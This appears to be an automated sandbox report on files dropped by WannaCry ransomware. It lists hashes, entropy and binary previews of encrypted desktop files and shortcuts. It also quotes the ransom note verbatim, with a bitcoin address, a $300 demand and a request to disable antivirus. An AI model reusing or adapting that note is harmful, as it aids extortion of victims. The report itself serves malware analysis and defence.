SHA-512:	C3982E5E13A9A0DD1A2990EA2AEA44747CC51E3B11930171200D6220C1AC18FA0503EE844A57C24E68982A1243EE609D441F0094CA9B2945D60BB32F43DB8168
Malicious:	false
Reputation:	unknown
Preview:	.[Ino..p.p......HL..5......A..>!z.a........nt.......D,.r8.~...+.......h;Tx..j{..W..I..F.LZ..N..y8I...S.../...l...fw.\|xN..=1..4..X.W~V.....p........N...KYi... ....Xc.......#\.......5.....0../\..-..6...dm.`....;....R..CB....hi...C?..=C......X.._..M.H.0;.4T.`.0.(4.u:...V..`....H.X...&^9..G....-.-:../l...;..iPY..5..>..6%j...v}..0h:....f..{Je@.].b....u.hv.oL...._......5....D.......;.\|g.C...{~.....n.b4.....L..^V..Ei..WG^<U..V....3.......oQ..'..B?..+.\.8HFoKD].E..PA..eK..-..se.O.9...:.e..&2.i...Hh...Kj..!.c,qv.L.u....[^..EM.... Qs.{....Q5z52H.w..sI ...%\.%t..I....(....f...?..#./[.k.}r......r%..>..>~Z.>FX..UC.>r.8....'.:#..Pm.....".....OG..z..f.yvYFO.m..3~u[....9...N/.w..+<k8.$..E\|..9....I\..\k.Y.$.....&...j......".}..5........SM<..x".}..dF.l+...S..g...F{..@..F._.N.. ...hh}.:...z.u...\|k..tu.....7..y.0J./...)......zU....?.?..-}q..IA......%).2r..Kl..S...e\|C~...0....V...RX....,N.S@vs..1...~.>...*...%.j....a....6..t.t..V.[M[....P-.....0Vx.&u-../....

C:\Users\user\Desktop\CZQKSDDMWR.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.832144545119537
Encrypted:	false
SSDEEP:	24:bkcsrg72Nu7S+tIi4oNgJ6pYTpktlguTeSQHA9NlSUpadkM/3qlxaeSKJ:bkcAu7S77mY1ktymeSQHAhSG+k+od5J
MD5:	BB4EDDD3B651D1273E287F5AE3CEBE49
SHA1:	95C773AE64ABBB45EAD280C281B39EB8175DB3CF
SHA-256:	9471708D43ACC6B37395102DD14BC4A712EF97DD52632CE3C5CD5479133255D8
SHA-512:	9DCA3B0F02A633A83A591F6370F678A6592C54085352380A1F2C3275C1DEAA59232879DCDB6C7F7CE1DC8B4D368F81783E672934B763844D02C446991165C287
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....J..Q..........X...+bU..-$.N/2..l..yZ.@.S...H.\|",.1.o....N..L.8.-.Y...>`H..t)y..6.].J.I.3...i..A.U.... .$.\|....F/.@...S.(...g.......G....&".#.yX$.^\n....-..S.S.'S...$.YPY.R.b.O.....*s.d....N0..d....\..1...., ..j.(V....y..Z.8w.CV.../..'...X\|..$.............h.B.M.2./@.....y-i.\|.zs.....\.p.vq1..1...D;.!al%.%....9Y.qC/`.)..N?Q.q"A]z...1_..4.A[..H.......g.<C.P\.e.2n..Q.@.s6fM..0.-!@;.@.v..........n]Rm.$...4..5...q..Oj..Ly...c.cs.......i....V..K....9.r[..Z.....Ge.+....Bl\....oD....+$1:..n..%./...n..^.Q(D..B.=...Nx......z..`+.Jt....>:....#....X....(....1M....\|.2...=..pZ.......B.r.\|..z5...K...........C.K...y.W........3..._"^..?'!.\|2..^8......U./..^T..V.}..ow.#.).r.)...`......i.R....gq.;.Tg..4.<I........z.<..._......-c.J.y..I..2D.Q+.c...g=.........<Ma.C..,l.i..= ...rM... ^dW.....#.......N.5=..T..a..#9..3..<...<r.{.yF.......a.H..Pc......1.].g(g....]9...\|\|;..y...{N.".2[E....K.r..d..F...o.p.....oHg...\..../.<9..CT.!z.Q.[.%4.h..z.#.#.$

C:\Users\user\Desktop\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.832144545119537
Encrypted:	false
SSDEEP:	24:bkcsrg72Nu7S+tIi4oNgJ6pYTpktlguTeSQHA9NlSUpadkM/3qlxaeSKJ:bkcAu7S77mY1ktymeSQHAhSG+k+od5J
MD5:	BB4EDDD3B651D1273E287F5AE3CEBE49
SHA1:	95C773AE64ABBB45EAD280C281B39EB8175DB3CF
SHA-256:	9471708D43ACC6B37395102DD14BC4A712EF97DD52632CE3C5CD5479133255D8
SHA-512:	9DCA3B0F02A633A83A591F6370F678A6592C54085352380A1F2C3275C1DEAA59232879DCDB6C7F7CE1DC8B4D368F81783E672934B763844D02C446991165C287
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....J..Q..........X...+bU..-$.N/2..l..yZ.@.S...H.\|",.1.o....N..L.8.-.Y...>`H..t)y..6.].J.I.3...i..A.U.... .$.\|....F/.@...S.(...g.......G....&".#.yX$.^\n....-..S.S.'S...$.YPY.R.b.O.....*s.d....N0..d....\..1...., ..j.(V....y..Z.8w.CV.../..'...X\|..$.............h.B.M.2./@.....y-i.\|.zs.....\.p.vq1..1...D;.!al%.%....9Y.qC/`.)..N?Q.q"A]z...1_..4.A[..H.......g.<C.P\.e.2n..Q.@.s6fM..0.-!@;.@.v..........n]Rm.$...4..5...q..Oj..Ly...c.cs.......i....V..K....9.r[..Z.....Ge.+....Bl\....oD....+$1:..n..%./...n..^.Q(D..B.=...Nx......z..`+.Jt....>:....#....X....(....1M....\|.2...=..pZ.......B.r.\|..z5...K...........C.K...y.W........3..._"^..?'!.\|2..^8......U./..^T..V.}..ow.#.).r.)...`......i.R....gq.;.Tg..4.<I........z.<..._......-c.J.y..I..2D.Q+.c...g=.........<Ma.C..,l.i..= ...rM... ^dW.....#.......N.5=..T..a..#9..3..<...<r.{.yF.......a.H..Pc......1.].g(g....]9...\|\|;..y...{N.".2[E....K.r..d..F...o.p.....oHg...\..../.<9..CT.!z.Q.[.%4.h..z.#.#.$

C:\Users\user\Desktop\EWZCVGNOWT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.830809064732855
Encrypted:	false
SSDEEP:	24:piyO6TiSoJgYlela6gGcwJ9+KRLVXskA5JCgz+5:pF2SoJZelawBz+KvRkfi5
MD5:	5106E57F92E0E425BE1B0223F0156403
SHA1:	66DA8344CFB0409D9E183147ED85A7D59426F686
SHA-256:	14365D34A09ECB8B161FD464A5C58EAF2CCB6F87CE08D565379B6FB870D39DEA
SHA-512:	9905590F155CE5A3F4B37E58B15682608E0687F7ED858F8B79487819B509AF166232F9D4C20C00E3BEDB0CFBD4E35DCC2CB23D2DFCC4E2AAEB904D41085B4EDC
Malicious:	false
Reputation:	unknown
Preview:	.1.7..)L:...u..A,}F...)gHZ..I..+.....!...m-E.Itkc....Oc...v8..b.?...a.8......s....\|<G....E...(.<Z5..0wh.<l..q9'/C.....#.......E..%[>_d..$.... .n....a....>..e..-...{.s&.1.......'.h...'^.<.]\|..j..9(.6...MQ..B.o.V..w.U.....M...P..........y.X..T....r..Q.qw2...O..>..+.7.<.A...=..:..Agw.c/..%......a-....Pz.P.$6z..<2...O..h...n).;x..,4x..{..l#.@..U6....{.Bx^.j.L......+..1Y..\2.[.....!u:.t..z=...@dK....P..r._....\!.l....{...mU..,9......M...n.C.......y._..i.E.BCF.pKO.9...w..KroB.6....U`.u....5.$w................Y.S........_.N.71............!.y.q2.".k.6....uP....P....,.\..g..(.&..&.3s.5kuA6.\F..o........8e..CJ.,R4.X2S[....cP7....._n...M..UvE7....K.:9........De.......H ."......$.M.I;_....Af0-.....CW:./,wB..j...\..=x...d.3x.{1..o.........<...Q...pfz..q........E.+....w.U.e....\|.F.....:...b%B....-..9...:NS~...'.....=Wa,.e...).P..2P.p.d..Q.........;.T...K.8s.UK9-...Qt............'~.fG.7.8J..*.z7......j..Wi... ...!:.g......x._.....H

C:\Users\user\Desktop\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.854622784812059
Encrypted:	false
SSDEEP:	24:bkpplLbFO7mibjwCIT4lq7XXDMfkJe3XM4liCEn:bkp3YmYj5q7nD+kJgcKi3
MD5:	7A78F9080FBFE10CCA2F889D2F04FF40
SHA1:	74A9B1F1F0BF2B1A7C0838487447732EF11014F3
SHA-256:	AD5956068DC6BD4555B0C38E48684555BF96F7A3665490DFF7762890902451E0
SHA-512:	DDA6C8D9027C441753CEFB92B2DB28B372B27AA1A6A260BBCDBC950301E4DDD44C86A6F43CEE9D5EA111124FB595E97728601AEA4342B173491400BAD2B11A92
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d..gb..3..C;.a{.D.2...[.D.M}Z..W..\|bc...N..Y.c...}...6...k.....xm..c.".`U..7....{Y!..P..T%3..7[...p$..D...kYc......]h.?.h..+U"o.5...L..o.....3...c..y#=....Z.%.M...7...."...7$.^6.y..s...~...........N~.kT......C.t..F.-!...A1.IPXr.....S...Z..,..............^G....)NF.n.rNyYdd.=.i...Y....4-.m....A.B A..(5.2Gr.'..R....a...R....5..=.eo7~..LK.C.@.K(=q.[..b9....._.w;l...Dj.8bq....Ui.E.........z.......z^lE....F./..N..B.s-...'....K..=._....A(.=...fx...v.U...O..i...yPzJ......&..F....k7.21q...........i.l..............M.9;m....v...7M......WW./61.<6..>.0 .....q..?\(+n.I.C'..w..^..fx.d:...U.,.....4.I...3o.2.qAy.)..n.i.J.g....W...y6...FI%~.'6&....D..\?.Sb.+...G=$...O2......IO._....Y.zT6.h\.5..%.....V..`.7.....l...V.b6[.Cm.p..W.1.gB....o.\|.g.%Cq....D N\|.3...Q&..-.!.tA........-.{..;..=.........>..Z...Q.1.kbmV....$..xN...X..L.....C...%e...Du.......F...o.p+.h.e#K...r..vDi.F..xD....).Y^34..x.q..^-..hb.,......@..=J.....im..5..^....(<q

C:\Users\user\Desktop\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.854622784812059
Encrypted:	false
SSDEEP:	24:bkpplLbFO7mibjwCIT4lq7XXDMfkJe3XM4liCEn:bkp3YmYj5q7nD+kJgcKi3
MD5:	7A78F9080FBFE10CCA2F889D2F04FF40
SHA1:	74A9B1F1F0BF2B1A7C0838487447732EF11014F3
SHA-256:	AD5956068DC6BD4555B0C38E48684555BF96F7A3665490DFF7762890902451E0
SHA-512:	DDA6C8D9027C441753CEFB92B2DB28B372B27AA1A6A260BBCDBC950301E4DDD44C86A6F43CEE9D5EA111124FB595E97728601AEA4342B173491400BAD2B11A92
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d..gb..3..C;.a{.D.2...[.D.M}Z..W..\|bc...N..Y.c...}...6...k.....xm..c.".`U..7....{Y!..P..T%3..7[...p$..D...kYc......]h.?.h..+U"o.5...L..o.....3...c..y#=....Z.%.M...7...."...7$.^6.y..s...~...........N~.kT......C.t..F.-!...A1.IPXr.....S...Z..,..............^G....)NF.n.rNyYdd.=.i...Y....4-.m....A.B A..(5.2Gr.'..R....a...R....5..=.eo7~..LK.C.@.K(=q.[..b9....._.w;l...Dj.8bq....Ui.E.........z.......z^lE....F./..N..B.s-...'....K..=._....A(.=...fx...v.U...O..i...yPzJ......&..F....k7.21q...........i.l..............M.9;m....v...7M......WW./61.<6..>.0 .....q..?\(+n.I.C'..w..^..fx.d:...U.,.....4.I...3o.2.qAy.)..n.i.J.g....W...y6...FI%~.'6&....D..\?.Sb.+...G=$...O2......IO._....Y.zT6.h\.5..%.....V..`.7.....l...V.b6[.Cm.p..W.1.gB....o.\|.g.%Cq....D N\|.3...Q&..-.!.tA........-.{..;..=.........>..Z...Q.1.kbmV....$..xN...X..L.....C...%e...Du.......F...o.p+.h.e#K...r..vDi.F..xD....).Y^34..x.q..^-..hb.,......@..=J.....im..5..^....(<q

C:\Users\user\Desktop\EWZCVGNOWT\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Desktop\EWZCVGNOWT\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\Desktop\EWZCVGNOWT\EWZCVGNOWT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.80931937500755
Encrypted:	false
SSDEEP:	24:BixfUHx8kQMkodh3/niXgbBrQH7EMcEhlBJgnAzH22KR:pR8kVk+1alHgkD8nUWj
MD5:	5168DA0C18F830519AC02C7FEE34AAB7
SHA1:	5CEBBF780E10714198E06069F69ECA8264E1CB77
SHA-256:	907C59EF3A69F4EFA10C921CA3EBC495659D7896E008942E8C39807D5EE90DF1
SHA-512:	0D4D1405495102C7DB781270CAA7FDEA5C08B1FFF553E260A9EA5795B7DBAA20C6078F5A67F1C7B9115834611D3A9A2A213967426E92B7AB8544FEB5FE4D1CDD
Malicious:	false
Reputation:	unknown
Preview:	......j.._Y.?I...S... ..F....A/..`.7`...z%..H...ct......L)B.v.!.8w..J....(.i...%...,C..>k.dd.... ..K.;Z...D!.^f..)..lr..[i+w.h6.l.."..._..G..m....j{J....S.M`....f.+@{..+.-..3....._f..$0..n..~u...L...A`.S..b.@...Wm...8v..!P..B..Y7..'........,.Q..0,S....%.O. .K~.X..A..-.C.#..!....o.'&....GJB...)....:.eCpg[m.mo.$......C.!]?.....X..o+\+..k..a.Ce.T..Tq..&7....Of>ZD.......qM...g.b\|J..8........T....m+h.o...J.t..G.C._).";Qp3S.!7....<....x..-...-..+.{.L.jM..E.....66X\.Q./.....y ..M.u.....9G.4..R...c.....b...u6.Z...;gW..,Hz...+FN..p....<F...G..'........W.L..by.M.#.WI .OV....F..?~.-....xe+........A...x.......?s]..sR....f.#....8>....M../.XE.=...~.qz...F6[.#H..=?\|.!X..ov........#cW..1.d#!..tm.^\|!"Rx...F..X....1....%4$J.M...&Ix..>.X@..E...T..9xs.w.../..1...<.V.M.nR(n%7u,....2i...zA...@....$w.......N....#.......E.<..{Z..... .Z.7..i.....Zp...>f.X.JsR...Y..D.c~j......Km........../...wR..J...0wi.n...d...=..n.......GV.*......n..4...}.;.;R.....

C:\Users\user\Desktop\EWZCVGNOWT\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834975454179717
Encrypted:	false
SSDEEP:	24:bkYMwBjBMZePhYnbBrT2duuc/4BMeBG0ysTJdaAlK0mNwp9OYbAIWmms:bkYd5/yZT2duus4Dg0ywJVp9OYbAIlms
MD5:	D0711B48723FD8FC065A25FDD7BFA84C
SHA1:	76941514D75F9ABF29A7A8209ADABDA2909900A1
SHA-256:	532F701D365D8F84A4AC137D138723BA2529B7F2DCE4DF7952C6BB748E2E34DE
SHA-512:	73E9229FC896AA94BA517767E9308F46DA0B0E2F0A05E4E12624E5A87022406F1F0D4F53683B18A30D5013A509E0510784646FDE0797E0B237206417A95B0D03
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......2t.N....A..._...wP..U.k.v.......!..mmzM.... ..CP.]..........b._..........L.-.$....#0.@(<.y...N..9.M.....ls..8.3cS./.!..T.)y1T......g.D3!.ZD.j.+........4..V...S%rE...s.rB....p.&.-......<........fmLH5......if.....e.0..p...]S.VE.a..#........L:............Y...`..Cb....Wt..m.w....x....dFX.......J.....4.F.......j..V...[3......h.)pw.,<Az...?.%..wB.pvG2ii.I.XR..N.;..H..p...o...l..;....)uE...h!.g.v..8.m..Vl.....z..U5.P._.g0...5O%.U..=..[..Y.jJ8-u.k...M&.....Ecoo...........j.SjbA..R._.j.u...r.....k..&.`.......q}1(.....b..S@.)^.c...d8..f....zH..F\...;}.b....Y..Axn.R_..U~.-.R..jF......H...._..1?!fS.0..\|../...<.o#...u...q....6~dyU..2....s~V...>..}Ob.?.6.i.n..\.43.....ZZ{.rF..8..u.....K...?..$.....9U.Y....<.GGc..it.....8..,..r.].^Ln.TH.b...,......;=..m..s....w%.,.\|....GF.?....U.o!..1...h....&.h.m}.........\|g.%#.M..Sh.$......>..E.....J...G..D[.....8l..!.I..yf.c..v*...eB_.....%.?....+..$.1.f..V.T..d..uYr.M.%....,G...?.B"......rL?E......h..^.

C:\Users\user\Desktop\EWZCVGNOWT\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834975454179717
Encrypted:	false
SSDEEP:	24:bkYMwBjBMZePhYnbBrT2duuc/4BMeBG0ysTJdaAlK0mNwp9OYbAIWmms:bkYd5/yZT2duus4Dg0ywJVp9OYbAIlms
MD5:	D0711B48723FD8FC065A25FDD7BFA84C
SHA1:	76941514D75F9ABF29A7A8209ADABDA2909900A1
SHA-256:	532F701D365D8F84A4AC137D138723BA2529B7F2DCE4DF7952C6BB748E2E34DE
SHA-512:	73E9229FC896AA94BA517767E9308F46DA0B0E2F0A05E4E12624E5A87022406F1F0D4F53683B18A30D5013A509E0510784646FDE0797E0B237206417A95B0D03
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......2t.N....A..._...wP..U.k.v.......!..mmzM.... ..CP.]..........b._..........L.-.$....#0.@(<.y...N..9.M.....ls..8.3cS./.!..T.)y1T......g.D3!.ZD.j.+........4..V...S%rE...s.rB....p.&.-......<........fmLH5......if.....e.0..p...]S.VE.a..#........L:............Y...`..Cb....Wt..m.w....x....dFX.......J.....4.F.......j..V...[3......h.)pw.,<Az...?.%..wB.pvG2ii.I.XR..N.;..H..p...o...l..;....)uE...h!.g.v..8.m..Vl.....z..U5.P._.g0...5O%.U..=..[..Y.jJ8-u.k...M&.....Ecoo...........j.SjbA..R._.j.u...r.....k..&.`.......q}1(.....b..S@.)^.c...d8..f....zH..F\...;}.b....Y..Axn.R_..U~.-.R..jF......H...._..1?!fS.0..\|../...<.o#...u...q....6~dyU..2....s~V...>..}Ob.?.6.i.n..\.43.....ZZ{.rF..8..u.....K...?..$.....9U.Y....<.GGc..it.....8..,..r.].^Ln.TH.b...,......;=..m..s....w%.,.\|....GF.?....U.o!..1...h....&.h.m}.........\|g.%#.M..Sh.$......>..E.....J...G..D[.....8l..!.I..yf.c..v*...eB_.....%.?....+..$.1.f..V.T..d..uYr.M.%....,G...?.B"......rL?E......h..^.

C:\Users\user\Desktop\EWZCVGNOWT\GIGIYTFFYT.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.832798952348822
Encrypted:	false
SSDEEP:	24:J0TqdlRVA1QzwtakthMGIpi+AZEvNg6o7/GWdwf:rdAaUtMGIjWEV58jdwf
MD5:	1BDDD68970CED4DD2E2187E014877171
SHA1:	6DF54077283EB5C1977197130F68BFA6D82D2A00
SHA-256:	5710F097BA631DFD54F1FDC18296EADCCC337F234EB5EE899AB72D35238FC21D
SHA-512:	1F4078AF5430764FF11725285F88C84EC956DD17CFF38193D59F393D6A3758ED8E61FFAC5BF8E543C9D3FEFBA80FADF0142730D57A185AC4FE0AB3A7CC0BCFC7
Malicious:	true
Reputation:	unknown
Preview:	G{....)].RXJn0..\|\|vT..+s5...rK...K...@....`.Q^...C...#..;.:FT..px.'..2..Y.p.].A..m....@2SG.c.....n...I.\|k..{: ....E.lm.........~...q..v.~+.Ua.<..sHD....2.[5g..d.....8sA..i6....I..o.......L..[...~.?s.RL.m.N....p(...s/#R..B..y.u..^...D[....J6.A..C....'.e..;....W..r..4..CR.)YaA...y)..D..X...A>.....}...k.e.R.TR...xz.]8.gGT...=.._.u.f3.!zd.......`.\4wC......Mfh.V...-.. .d4$.-P(.'.'.V.J...X.&.....T.V.(..~..i...u.....F........,....-^.2h.p.......R.[N_....;.....M1O...p.w..&..Y6..;....5G]H.t.B\|Aw..)\?....i.$x..&.....1x!D7.._..&.dT&8..>}.............<..[...0..[.e...0...t.ic...i......Z.d...w.6..A.e.".:...x..H...6. H.?..z!z.."..#..[....+.[I.2J...M.. .8x.L..{..b.\..J..JU....\\....0Gs....M`c.. N..B..m..z4..Nbg+%...6..-5&`......i..!jl..p/...L...9f..u_C....~C.....z"...@L]$...=.w..9LD,8...,...7...AnU&.........\|$".,w.D.h.]....i.I8...i.._.oA..]~....x.S...2...bX.....\..K.}..}......i/.-.b......]....\|.x.J.....v..M...u.>.....atG4.....(.b..h.1....v.`.g....

C:\Users\user\Desktop\EWZCVGNOWT\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.855272120929399
Encrypted:	false
SSDEEP:	24:bkUPYBRJluS+xIveZgPAB6Roqbhrn905a2JlYvRRhrKALPEN+Tx2kMWVWNbLvsE7:bkUwBRQNFB6RRbFn0a2JlY5RsAbEN+9w
MD5:	A133EA82F8F2BC6B5E4B0D65CF5BD92A
SHA1:	75D58873B32482A30509F495EF630D1D3B67E1DF
SHA-256:	4B1B747A23F343BA89971D67D314CB6069F79388471C70DBCC96123BFF49FBC0
SHA-512:	81021FD127D28EE3F6426C7FC5A2C23839820EDBBA3894E7E05D461E6993BDE58679ABA81982B5AF36C1C1D56FDC9D108A15B4753E52C454F28048EFF4AC949B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......h.......(..&..g.._.L.a;..4..A...~N...]t......a..{....6B.T..\| .......V.].Q.{l...............+..A.].....X$...T<h7Me..hrD...p.w.[`sy.T..p..h...L=......=^.f...D~m6.....\|84..a.4A.;.@.sHl`...J...J-D....C..?7x...1a...->.....QH....6 W=......u.-....@...................8K.'..~z`...V[\|h=.JnD.A....x......g.8.tBS...{...T~0..C...<@..l@.8..P.D.....b.#...).=x....qrk........]]..E?.\Tb...A......P.^.)H....0....W..!.\|...(&....W.M.z.....5...g.b....[.[M<.{w...2...&..(..G.B...).J........B~J>A..Q..f..3QG..C.KS.,.G....'...m......U....`...(C&.9..v.Y...b.~.@...5S_eE[.n/oe...[-y.....Y.....F....f3...]...?./A.{:.4..{1{..(:...W..A..@Y.U .m...=)..w..v.{.....r(}B.8jS},...j...5......yJ..a!..0.UTp.......Y."....DT..l.0...$.;.-..H{:-...G...7..~.!%[+.[..S...s.j8U...d.F...X.D..w.T..P..R<.e......iQ.J.\aK..0..y...k...V.........u.!...!..ZHB..r...H...k.U..Nv.Mg..h.KU......_........#.*..MQk...I.....+j..;.y..GZ.....H..k.}..e.....c......=..IW.o...9Y&.,=....N.).k...N".#..

C:\Users\user\Desktop\EWZCVGNOWT\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.855272120929399
Encrypted:	false
SSDEEP:	24:bkUPYBRJluS+xIveZgPAB6Roqbhrn905a2JlYvRRhrKALPEN+Tx2kMWVWNbLvsE7:bkUwBRQNFB6RRbFn0a2JlY5RsAbEN+9w
MD5:	A133EA82F8F2BC6B5E4B0D65CF5BD92A
SHA1:	75D58873B32482A30509F495EF630D1D3B67E1DF
SHA-256:	4B1B747A23F343BA89971D67D314CB6069F79388471C70DBCC96123BFF49FBC0
SHA-512:	81021FD127D28EE3F6426C7FC5A2C23839820EDBBA3894E7E05D461E6993BDE58679ABA81982B5AF36C1C1D56FDC9D108A15B4753E52C454F28048EFF4AC949B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......h.......(..&..g.._.L.a;..4..A...~N...]t......a..{....6B.T..\| .......V.].Q.{l...............+..A.].....X$...T<h7Me..hrD...p.w.[`sy.T..p..h...L=......=^.f...D~m6.....\|84..a.4A.;.@.sHl`...J...J-D....C..?7x...1a...->.....QH....6 W=......u.-....@...................8K.'..~z`...V[\|h=.JnD.A....x......g.8.tBS...{...T~0..C...<@..l@.8..P.D.....b.#...).=x....qrk........]]..E?.\Tb...A......P.^.)H....0....W..!.\|...(&....W.M.z.....5...g.b....[.[M<.{w...2...&..(..G.B...).J........B~J>A..Q..f..3QG..C.KS.,.G....'...m......U....`...(C&.9..v.Y...b.~.@...5S_eE[.n/oe...[-y.....Y.....F....f3...]...?./A.{:.4..{1{..(:...W..A..@Y.U .m...=)..w..v.{.....r(}B.8jS},...j...5......yJ..a!..0.UTp.......Y."....DT..l.0...$.;.-..H{:-...G...7..~.!%[+.[..S...s.j8U...d.F...X.D..w.T..P..R<.e......iQ.J.\aK..0..y...k...V.........u.!...!..ZHB..r...H...k.U..Nv.Mg..h.KU......_........#.*..MQk...I.....+j..;.y..GZ.....H..k.}..e.....c......=..IW.o...9Y&.,=....N.).k...N".#..

C:\Users\user\Desktop\EWZCVGNOWT\JDDHMPCDUJ.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.838062896968061
Encrypted:	false
SSDEEP:	24:5pnR8KhhmOL8qTK145wWinopwKRUN4M/bJJUG9ITCAuFeOx:5pO747vRU+HeIoFe4
MD5:	330B5ED0FB6E3A91462C9BDAD33ACE72
SHA1:	F1622CBC7989B82644175DFC33559D0B44A04DF3
SHA-256:	DD269D641BF0981A395ECF0914E0048F9122F0DA77A1F3438F3AB96C6D843D6D
SHA-512:	A9DB982847BDBB8065B0F22196D80A11B0777CC68E3B0009A75CC9C3BD7DA255F151700AE0DFE1C6164AC4F814E241BF5AB0B7BC49CFCDA81EC6FA9D75E15EE3
Malicious:	false
Reputation:	unknown
Preview:	.D.$.7=..=i.........[.....".s....n#......'.....e......+....>..M...3.../.Qg......`.f.%...'...,....F..........K.Gp.......5.b....b.\...Oh...^....i=..=...ktp..ga.6..t.}.:..V...`.f.i....}.G..x.....\R.....r...7D(..BW:H[..........i.x..8.L..E........p.....q..P}.=.p.....81./V......".5.....{&..Y..5.{Cm...]P....>4.f .d[...1.._...LT(.L..j.<:..p....[.KC...2..zo..2%)9.2.U..6;.em...%.v,.V..K8..b&..R..%.......H...C....0:.....=.+1.....TU.........3.q...5....u..c...A....n?...`?..-c..u3. ...D(...bece..W....K.....BiZ.<.gZ\|...G>......:.3..F4J.=..._.......x6l.T>...0._....,....t..h..WH..jj..S...s8.....O..%..r...d$..........#4.M.. .J....l=.s..[WD..U.^K.~?A...yN...<.2..1}. ...}.I@.c..:7..1p.N.r.o[.3S..i.<......]..z.t"+...:.@..^..).....LTNU..}.I..<...]...h....My....._>...&.g...bf6.K.......P.oP.s]NV.c.&!.......9.x.......4.N..A.v....j..#$j.....v....5_=j...e]8......[...k.sa.p.\|!s1..3.ur.).t?."J0..b....C..Z)..,.b.4....4->[.t&.......w,~c....x.\.W?.ec......#}.ek....*.....

